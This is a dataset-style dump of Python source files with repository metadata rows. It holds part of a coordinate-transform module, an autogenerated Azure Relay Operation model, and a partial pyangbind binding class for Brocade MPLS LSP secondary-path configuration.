M, vec = self.transform_func(fromcoord, toframe)
newrep = self._apply_transform(fromcoord, M, vec)
return toframe.realize_frame(newrep)
class StaticMatrixTransform(BaseAffineTransform):
def __init__(self, matrix, fromsys, tosys, priority=1, register_graph=None):
if six.callable(matrix):
matrix = matrix()
self.matrix = np.array(matrix)
if self.matrix.shape != (3, 3):
raise ValueError('Provided matrix is not 3 x 3')
super(StaticMatrixTransform, self).__init__(fromsys, tosys,
priority=priority,
register_graph=register_graph)
def __call__(self, fromcoord, toframe):
newrep = self._apply_transform(fromcoord, self.matrix, None)
return toframe.realize_frame(newrep)
class DynamicMatrixTransform(BaseAffineTransform):
def __init__(self, matrix_func, fromsys, tosys, priority=1,
register_graph=None):
if not six.callable(matrix_func):
raise TypeError('matrix_func is not callable')
self.matrix_func = matrix_func
def _transform_func(fromcoord, toframe):
return self.matrix_func(fromcoord, toframe), None
super(DynamicMatrixTransform, self).__init__(fromsys, tosys,
priority=priority,
register_graph=register_graph)
def __call__(self, fromcoord, toframe):
M = self.matrix_func(fromcoord, toframe)
newrep = self._apply_transform(fromcoord, M, None)
return toframe.realize_frame(newrep)
class CompositeTransform(CoordinateTransform):
def __init__(self, transforms, fromsys, tosys, priority=1,
register_graph=None, collapse_static_mats=True):
super(CompositeTransform, self).__init__(fromsys, tosys,
priority=priority,
register_graph=register_graph)
if collapse_static_mats:
transforms = self._combine_statics(transforms)
self.transforms = tuple(transforms)
def _combine_statics(self, transforms):
newtrans = []
for currtrans in transforms:
lasttrans = newtrans[-1] if len(newtrans) > 0 else None
if (isinstance(lasttrans, StaticMatrixTransform) and
isinstance(currtrans, StaticMatrixTransform)):
combinedmat = np.dot(lasttrans.matrix, currtrans.matrix)
newtrans[-1] = StaticMatrixTransform(combinedmat,
lasttrans.fromsys,
currtrans.tosys)
else:
newtrans.append(currtrans)
return newtrans
def __call__(self, fromcoord, toframe):
curr_coord = fromcoord
for t in self.transforms:
# build an intermediate frame with attributes taken from either
# `fromframe`, or if not there, `toframe`, or if not there, use
# the defaults
# TODO: caching this information when creating the transform may
# speed things up a lot
frattrs = {}
for inter_frame_attr_nm in t.tosys.get_frame_attr_names():
if hasattr(toframe, inter_frame_attr_nm):
attr = getattr(toframe, inter_frame_attr_nm)
frattrs[inter_frame_attr_nm] = attr
elif hasattr(fromcoord, inter_frame_attr_nm):
attr = getattr(fromcoord, inter_frame_attr_nm)
frattrs[inter_frame_attr_nm] = attr
curr_toframe = t.tosys(**frattrs)
curr_coord = t(curr_coord, curr_toframe)
# this is safe even in the case where self.transforms is empty, because
# coordinate objects are immutible, so copying is not needed
return curr_coord
# map class names to colorblind-safe colors
trans_to_color = OrderedDict()
trans_to_color[AffineTransform] = '
trans_to_color[FunctionTransform] = '
trans_to_color[FunctionTransformWithFiniteDifference] = '
trans_to_color[StaticMatrixTransform] = '
trans_to_color[DynamicMatrixTransform] = '
| true
| true
|
1c446d85e9321da7a48cf104ae990269b5592a7d
| 1,266
|
py
|
Python
|
sdk/relay/azure-mgmt-relay/azure/mgmt/relay/models/operation_py3.py
|
iscai-msft/azure-sdk-for-python
|
83715b95c41e519d5be7f1180195e2fba136fc0f
|
[
"MIT"
] | 8
|
2021-01-13T23:44:08.000Z
|
2021-03-17T10:13:36.000Z
|
sdk/relay/azure-mgmt-relay/azure/mgmt/relay/models/operation_py3.py
|
iscai-msft/azure-sdk-for-python
|
83715b95c41e519d5be7f1180195e2fba136fc0f
|
[
"MIT"
] | 226
|
2019-07-24T07:57:21.000Z
|
2019-10-15T01:07:24.000Z
|
sdk/relay/azure-mgmt-relay/azure/mgmt/relay/models/operation_py3.py
|
iscai-msft/azure-sdk-for-python
|
83715b95c41e519d5be7f1180195e2fba136fc0f
|
[
"MIT"
] | 2
|
2020-05-21T22:51:22.000Z
|
2020-05-26T20:53:01.000Z
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class Operation(Model):
"""A Relay REST API operation.
Variables are only populated by the server, and will be ignored when
sending a request.
:ivar name: Operation name: {provider}/{resource}/{operation}
:vartype name: str
:param display: The object that represents the operation.
:type display: ~azure.mgmt.relay.models.OperationDisplay
"""
_validation = {
'name': {'readonly': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'display': {'key': 'display', 'type': 'OperationDisplay'},
}
def __init__(self, *, display=None, **kwargs) -> None:
super(Operation, self).__init__(**kwargs)
self.name = None
self.display = display
| 31.65
| 76
| 0.584518
|
from msrest.serialization import Model
class Operation(Model):
_validation = {
'name': {'readonly': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'display': {'key': 'display', 'type': 'OperationDisplay'},
}
def __init__(self, *, display=None, **kwargs) -> None:
super(Operation, self).__init__(**kwargs)
self.name = None
self.display = display
| true
| true
|
1c446daa36eb0e4b3800e1664e4e66ac001cceea
| 72,230
|
py
|
Python
|
pybind/slxos/v17r_2_00/mpls_config/router/mpls/mpls_cmds_holder/lsp/secondary_path/__init__.py
|
extremenetworks/pybind
|
44c467e71b2b425be63867aba6e6fa28b2cfe7fb
|
[
"Apache-2.0"
] | null | null | null |
pybind/slxos/v17r_2_00/mpls_config/router/mpls/mpls_cmds_holder/lsp/secondary_path/__init__.py
|
extremenetworks/pybind
|
44c467e71b2b425be63867aba6e6fa28b2cfe7fb
|
[
"Apache-2.0"
] | null | null | null |
pybind/slxos/v17r_2_00/mpls_config/router/mpls/mpls_cmds_holder/lsp/secondary_path/__init__.py
|
extremenetworks/pybind
|
44c467e71b2b425be63867aba6e6fa28b2cfe7fb
|
[
"Apache-2.0"
] | 1
|
2021-11-05T22:15:42.000Z
|
2021-11-05T22:15:42.000Z
|
from operator import attrgetter
import pyangbind.lib.xpathhelper as xpathhelper
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType, RestrictedClassType, TypedListType
from pyangbind.lib.yangtypes import YANGBool, YANGListType, YANGDynClass, ReferenceType
from pyangbind.lib.base import PybindBase
from decimal import Decimal
from bitarray import bitarray
import __builtin__
import lsp_traffic_engineering
import priority
import lsp_secpath_auto_bandwidth
class secondary_path(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module brocade-mpls - based on the path /mpls-config/router/mpls/mpls-cmds-holder/lsp/secondary-path. Each member element of
the container is represented as a class variable - with a specific
YANG type.
"""
__slots__ = ('_pybind_generated_by', '_path_helper', '_yang_name', '_rest_name', '_extmethods', '__secpath_name','__secpath_standby','__secpath_bfd','__secpath_cspf','__secpath_ipmtu','__lsp_adaptive','__lsp_reoptimize_timer','__lsp_commit','__lsp_record','__lsp_cos','__lsp_hop_limit','__lsp_cspf_computation_mode','__lsp_traffic_engineering','__priority','__lsp_exclude_any','__lsp_include_any','__lsp_include_all','__secpath_soft_preemption','__lsp_secpath_auto_bandwidth',)
_yang_name = 'secondary-path'
_rest_name = 'secondary-path'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
path_helper_ = kwargs.pop("path_helper", None)
if path_helper_ is False:
self._path_helper = False
elif path_helper_ is not None and isinstance(path_helper_, xpathhelper.YANGPathHelper):
self._path_helper = path_helper_
elif hasattr(self, "_parent"):
path_helper_ = getattr(self._parent, "_path_helper", False)
self._path_helper = path_helper_
else:
self._path_helper = False
extmethods = kwargs.pop("extmethods", None)
if extmethods is False:
self._extmethods = False
elif extmethods is not None and isinstance(extmethods, dict):
self._extmethods = extmethods
elif hasattr(self, "_parent"):
extmethods = getattr(self._parent, "_extmethods", None)
self._extmethods = extmethods
else:
self._extmethods = False
self.__priority = YANGDynClass(base=priority.priority, is_container='container', presence=False, yang_name="priority", rest_name="priority", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'LSP setup and holding priority levels', u'cli-sequence-commands': None, u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='container', is_config=True)
self.__secpath_standby = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="secpath-standby", rest_name="standby", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Make secondary-path hot standby', u'alt-name': u'standby'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='empty', is_config=True)
self.__lsp_secpath_auto_bandwidth = YANGDynClass(base=lsp_secpath_auto_bandwidth.lsp_secpath_auto_bandwidth, is_container='container', presence=True, yang_name="lsp-secpath-auto-bandwidth", rest_name="autobw", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Enable Auto-bandwidth on secondary path', u'cli-full-no': None, u'callpoint': u'MplsLspSecPathAutoBandwidth', u'cli-full-command': None, u'cli-add-mode': None, u'alt-name': u'autobw', u'cli-mode-name': u'config-router-mpls-lsp-$(../../lsp-name)-secpath-$(../secpath-name)-autobw'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='container', is_config=True)
self.__lsp_cos = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0..7']}), is_leaf=True, yang_name="lsp-cos", rest_name="cos", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Configure class of service', u'cli-full-no': None, u'alt-name': u'cos'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
self.__lsp_include_all = YANGDynClass(base=TypedListType(allowed_type=RestrictedClassType(base_type=unicode, restriction_dict={'length': [u'1..256']})), is_leaf=False, yang_name="lsp-include-all", rest_name="include-all", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Include all of the administrative groups', u'cli-full-no': None, u'cli-suppress-list-no': None, u'cli-full-command': None, u'cli-flat-list-syntax': None, u'alt-name': u'include-all'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
self.__lsp_hop_limit = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), restriction_dict={'range': [u'0..255']}), is_leaf=True, yang_name="lsp-hop-limit", rest_name="hop-limit", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Limit of hops the LSP can traverse', u'cli-full-no': None, u'alt-name': u'hop-limit'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint16', is_config=True)
self.__lsp_cspf_computation_mode = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'use-igp-metric': {'value': 1}, u'use-te-metric': {'value': 2}},), is_leaf=True, yang_name="lsp-cspf-computation-mode", rest_name="cspf-computation-mode", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Specify cspf-computation-mode', u'cli-full-no': None, u'alt-name': u'cspf-computation-mode'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='cspf-computation-mode', is_config=True)
self.__lsp_reoptimize_timer = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'300..65535']}), is_leaf=True, yang_name="lsp-reoptimize-timer", rest_name="reoptimize-timer", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Configure Reoptimization timer', u'cli-full-no': None, u'alt-name': u'reoptimize-timer'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
self.__secpath_ipmtu = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'576..1526']}), is_leaf=True, yang_name="secpath-ipmtu", rest_name="ipmtu", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'IP Packet Maximum Transmission Unit', u'cli-full-no': None, u'alt-name': u'ipmtu'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
self.__lsp_traffic_engineering = YANGDynClass(base=lsp_traffic_engineering.lsp_traffic_engineering, is_container='container', presence=False, yang_name="lsp-traffic-engineering", rest_name="traffic-engineering", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-compact-syntax': None, u'info': u'LSP traffic engineering parameters', u'alt-name': u'traffic-engineering', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='container', is_config=True)
self.__lsp_commit = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-commit", rest_name="commit", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Commit the changes to adaptive LSP', u'alt-name': u'commit', u'cli-suppress-no': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='empty', is_config=True)
self.__secpath_soft_preemption = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="secpath-soft-preemption", rest_name="soft-preemption", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Set LSP soft preemption capability', u'cli-full-no': None, u'alt-name': u'soft-preemption'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='empty', is_config=True)
self.__lsp_include_any = YANGDynClass(base=TypedListType(allowed_type=RestrictedClassType(base_type=unicode, restriction_dict={'length': [u'1..256']})), is_leaf=False, yang_name="lsp-include-any", rest_name="include-any", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Include any of the administrative groups', u'cli-full-no': None, u'cli-suppress-list-no': None, u'cli-full-command': None, u'cli-flat-list-syntax': None, u'alt-name': u'include-any'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
self.__secpath_bfd = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="secpath-bfd", rest_name="bfd", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Enable bfd for secondary-path', u'hidden': u'full', u'alt-name': u'bfd'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='empty', is_config=True)
self.__secpath_cspf = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'enable': {'value': 1}, u'disable': {'value': 0}},), is_leaf=True, yang_name="secpath-cspf", rest_name="cspf", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Enable/Disable cspf', u'cli-full-no': None, u'alt-name': u'cspf'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='enable-disable', is_config=True)
self.__lsp_exclude_any = YANGDynClass(base=TypedListType(allowed_type=RestrictedClassType(base_type=unicode, restriction_dict={'length': [u'1..256']})), is_leaf=False, yang_name="lsp-exclude-any", rest_name="exclude-any", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Exclude any of the administrative groups', u'cli-full-no': None, u'cli-suppress-list-no': None, u'cli-full-command': None, u'cli-flat-list-syntax': None, u'alt-name': u'exclude-any'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
self.__secpath_name = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'length': [u'1..64']}), is_leaf=True, yang_name="secpath-name", rest_name="secpath-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Set secondary explicit path'}}, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
self.__lsp_record = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'enable': {'value': 1}, u'disable': {'value': 0}},), is_leaf=True, yang_name="lsp-record", rest_name="record", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Enable/disable recording path routes', u'cli-full-no': None, u'alt-name': u'record'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='enable-disable', is_config=True)
self.__lsp_adaptive = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-adaptive", rest_name="adaptive", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Configure LSP/secpath to be adaptive', u'cli-full-no': None, u'alt-name': u'adaptive'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='empty', is_config=True)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return [u'mpls-config', u'router', u'mpls', u'mpls-cmds-holder', u'lsp', u'secondary-path']
def _rest_path(self):
if hasattr(self, "_parent"):
if self._rest_name:
return self._parent._rest_path()+[self._rest_name]
else:
return self._parent._rest_path()
else:
return [u'router', u'mpls', u'lsp', u'secondary-path']
def _get_secpath_name(self):
"""
Getter method for secpath_name, mapped from YANG variable /mpls_config/router/mpls/mpls_cmds_holder/lsp/secondary_path/secpath_name (string)
"""
return self.__secpath_name
def _set_secpath_name(self, v, load=False):
"""
Setter method for secpath_name, mapped from YANG variable /mpls_config/router/mpls/mpls_cmds_holder/lsp/secondary_path/secpath_name (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_secpath_name is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_secpath_name() directly.
"""
parent = getattr(self, "_parent", None)
if parent is not None and load is False:
raise AttributeError("Cannot set keys directly when" +
" within an instantiated list")
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_dict={'length': [u'1..64']}), is_leaf=True, yang_name="secpath-name", rest_name="secpath-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Set secondary explicit path'}}, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """secpath_name must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'length': [u'1..64']}), is_leaf=True, yang_name="secpath-name", rest_name="secpath-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Set secondary explicit path'}}, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)""",
})
self.__secpath_name = t
if hasattr(self, '_set'):
self._set()
def _unset_secpath_name(self):
self.__secpath_name = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'length': [u'1..64']}), is_leaf=True, yang_name="secpath-name", rest_name="secpath-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Set secondary explicit path'}}, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
def _get_secpath_standby(self):
"""
Getter method for secpath_standby, mapped from YANG variable /mpls_config/router/mpls/mpls_cmds_holder/lsp/secondary_path/secpath_standby (empty)
"""
return self.__secpath_standby
def _set_secpath_standby(self, v, load=False):
"""
Setter method for secpath_standby, mapped from YANG variable /mpls_config/router/mpls/mpls_cmds_holder/lsp/secondary_path/secpath_standby (empty)
If this variable is read-only (config: false) in the
source YANG file, then _set_secpath_standby is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_secpath_standby() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="secpath-standby", rest_name="standby", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Make secondary-path hot standby', u'alt-name': u'standby'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='empty', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """secpath_standby must be of a type compatible with empty""",
'defined-type': "empty",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="secpath-standby", rest_name="standby", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Make secondary-path hot standby', u'alt-name': u'standby'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='empty', is_config=True)""",
})
self.__secpath_standby = t
if hasattr(self, '_set'):
self._set()
def _unset_secpath_standby(self):
self.__secpath_standby = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="secpath-standby", rest_name="standby", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Make secondary-path hot standby', u'alt-name': u'standby'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='empty', is_config=True)
def _get_secpath_bfd(self):
"""
Getter method for secpath_bfd, mapped from YANG variable /mpls_config/router/mpls/mpls_cmds_holder/lsp/secondary_path/secpath_bfd (empty)
"""
return self.__secpath_bfd
def _set_secpath_bfd(self, v, load=False):
"""
Setter method for secpath_bfd, mapped from YANG variable /mpls_config/router/mpls/mpls_cmds_holder/lsp/secondary_path/secpath_bfd (empty)
If this variable is read-only (config: false) in the
source YANG file, then _set_secpath_bfd is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_secpath_bfd() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="secpath-bfd", rest_name="bfd", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Enable bfd for secondary-path', u'hidden': u'full', u'alt-name': u'bfd'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='empty', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """secpath_bfd must be of a type compatible with empty""",
'defined-type': "empty",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="secpath-bfd", rest_name="bfd", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Enable bfd for secondary-path', u'hidden': u'full', u'alt-name': u'bfd'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='empty', is_config=True)""",
})
self.__secpath_bfd = t
if hasattr(self, '_set'):
self._set()
def _unset_secpath_bfd(self):
self.__secpath_bfd = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="secpath-bfd", rest_name="bfd", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Enable bfd for secondary-path', u'hidden': u'full', u'alt-name': u'bfd'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='empty', is_config=True)
def _get_secpath_cspf(self):
"""
Getter method for secpath_cspf, mapped from YANG variable /mpls_config/router/mpls/mpls_cmds_holder/lsp/secondary_path/secpath_cspf (enable-disable)
"""
return self.__secpath_cspf
def _set_secpath_cspf(self, v, load=False):
"""
Setter method for secpath_cspf, mapped from YANG variable /mpls_config/router/mpls/mpls_cmds_holder/lsp/secondary_path/secpath_cspf (enable-disable)
If this variable is read-only (config: false) in the
source YANG file, then _set_secpath_cspf is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_secpath_cspf() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'enable': {'value': 1}, u'disable': {'value': 0}},), is_leaf=True, yang_name="secpath-cspf", rest_name="cspf", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Enable/Disable cspf', u'cli-full-no': None, u'alt-name': u'cspf'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='enable-disable', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """secpath_cspf must be of a type compatible with enable-disable""",
'defined-type': "brocade-mpls:enable-disable",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'enable': {'value': 1}, u'disable': {'value': 0}},), is_leaf=True, yang_name="secpath-cspf", rest_name="cspf", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Enable/Disable cspf', u'cli-full-no': None, u'alt-name': u'cspf'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='enable-disable', is_config=True)""",
})
self.__secpath_cspf = t
if hasattr(self, '_set'):
self._set()
def _unset_secpath_cspf(self):
self.__secpath_cspf = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'enable': {'value': 1}, u'disable': {'value': 0}},), is_leaf=True, yang_name="secpath-cspf", rest_name="cspf", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Enable/Disable cspf', u'cli-full-no': None, u'alt-name': u'cspf'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='enable-disable', is_config=True)
def _get_secpath_ipmtu(self):
"""
Getter method for secpath_ipmtu, mapped from YANG variable /mpls_config/router/mpls/mpls_cmds_holder/lsp/secondary_path/secpath_ipmtu (uint32)
"""
return self.__secpath_ipmtu
def _set_secpath_ipmtu(self, v, load=False):
"""
Setter method for secpath_ipmtu, mapped from YANG variable /mpls_config/router/mpls/mpls_cmds_holder/lsp/secondary_path/secpath_ipmtu (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_secpath_ipmtu is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_secpath_ipmtu() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'576..1526']}), is_leaf=True, yang_name="secpath-ipmtu", rest_name="ipmtu", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'IP Packet Maximum Transmission Unit', u'cli-full-no': None, u'alt-name': u'ipmtu'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """secpath_ipmtu must be of a type compatible with uint32""",
'defined-type': "uint32",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'576..1526']}), is_leaf=True, yang_name="secpath-ipmtu", rest_name="ipmtu", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'IP Packet Maximum Transmission Unit', u'cli-full-no': None, u'alt-name': u'ipmtu'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)""",
})
self.__secpath_ipmtu = t
if hasattr(self, '_set'):
self._set()
def _unset_secpath_ipmtu(self):
